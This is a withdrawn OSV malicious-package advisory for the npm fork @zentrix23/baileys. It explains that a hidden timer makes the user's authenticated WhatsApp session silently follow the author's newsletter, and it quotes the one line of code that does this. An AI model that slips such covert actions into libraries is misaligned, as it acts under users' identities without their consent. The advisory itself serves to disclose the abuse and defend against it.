MAL-2026-4470

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@zentrix23/baileys/MAL-2026-4470.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4470
Withdrawn
2026-05-26T21:41:23Z
Published
2026-05-21T01:33:24Z
Modified
2026-05-27T00:32:04.196003915Z
Summary
Malicious code in @zentrix23/baileys (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (00e60d3c1f2afd09e236dc4a5ae0cf2373029e6c62c4f7a9c571b13c2da01cd7)

This package is a fork of @whiskeysockets/baileys with an undocumented modification: inside makeNewsletterSocket (called unconditionally by makeWASocket()), a setTimeout schedules a FOLLOW mutation against the hardcoded newsletter JID '120363425412882254@newsletter' (Zentrix Tech) 90 seconds after socket creation, using the consumer's authenticated WhatsApp session. Errors are silently swallowed (try/catch {}). Any developer or bot operator using this library to automate a WhatsApp account will have that account silently follow the author's promotional newsletter without consent or disclosure. This is a silent-relay / covert-action pattern: the package's normal advertised API (WhatsApp socket library) is weaponized to perform an unrelated action benefiting the author using the caller's identity. Evidence: lib/Socket/newsletter.js ~line 95 contains setTimeout(async () => { try { await newsletterWMexQuery('120363425412882254@newsletter', Types_1.QueryIds.FOLLOW); } catch {} }, 90000);. Separately, lib/Utils/generics.js line 276 fetches a version JSON from raw.githubusercontent.com/kiuur/bails/master/... — a personal user's mutable branch unrelated to the upstream Baileys publisher; this is user-invoked (not auto-executed) and the response is parsed as JSON only, so it is a quality concern rather than RCE, but it indicates the fork is not a trusted republish of upstream.

Database specific 
{
    "malicious-packages-origins": [
        {
            "sha256": "00e60d3c1f2afd09e236dc4a5ae0cf2373029e6c62c4f7a9c571b13c2da01cd7",
            "id": "IN-MAL-2026-003693",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T01:33:24Z",
            "versions": [
                "1.0.0"
            ],
            "import_time": "2026-05-26T05:51:07.51782117Z"
        }
    ]
}
References
Credits

Affected packages

npm / @zentrix23/baileys

Package

Name
@zentrix23/baileys
View open source insights on deps.dev
Purl
pkg:npm/%40zentrix23%2Fbaileys

Affected ranges

Affected versions

1.*
1.0.0

Database specific

source 
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@zentrix23/baileys/MAL-2026-4470.json"
cwes 
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators 
{
    "evidence_files": [
        {
            "sha256": "4ae5b6a68e081e72a5933791417b58565f3fca9838e5488ac0a1524eb2576d42",
            "tlsh": "3142a55665fa5ba617a37054e63fb0e0b320f243796598673f8c90020f4e1dda8b3bd9",
            "path": "lib/Socket/newsletter.js"
        },
        {
            "tlsh": "55621aca9bf344770793a1d9a727e016bb3ac8233159c4f8f91d87205f814a4cad67e9",
            "sha256": "7829406447a48fdfbdd3ab329845a21c199b8143deebe777dd8ce8f7c2b82f7d",
            "path": "lib/Utils/generics.js"
        }
    ],
    "package_integrity": [
        {
            "filename": "baileys-1.0.0.tgz",
            "hashes": {
                "sha1": "83aab7db2ae9c6f3cde2ab9683987c9ef1c4336d",
                "sha512_sri": "sha512-+AE1PvwUeLAelPDMTwm++X39tg+NFcgMOdrTxwfrkyhlkJ4h+QOtuJMP8IElzoE+WT4tEG37yRhdtPmcojhfwQ=="
            }
        }
    ]
}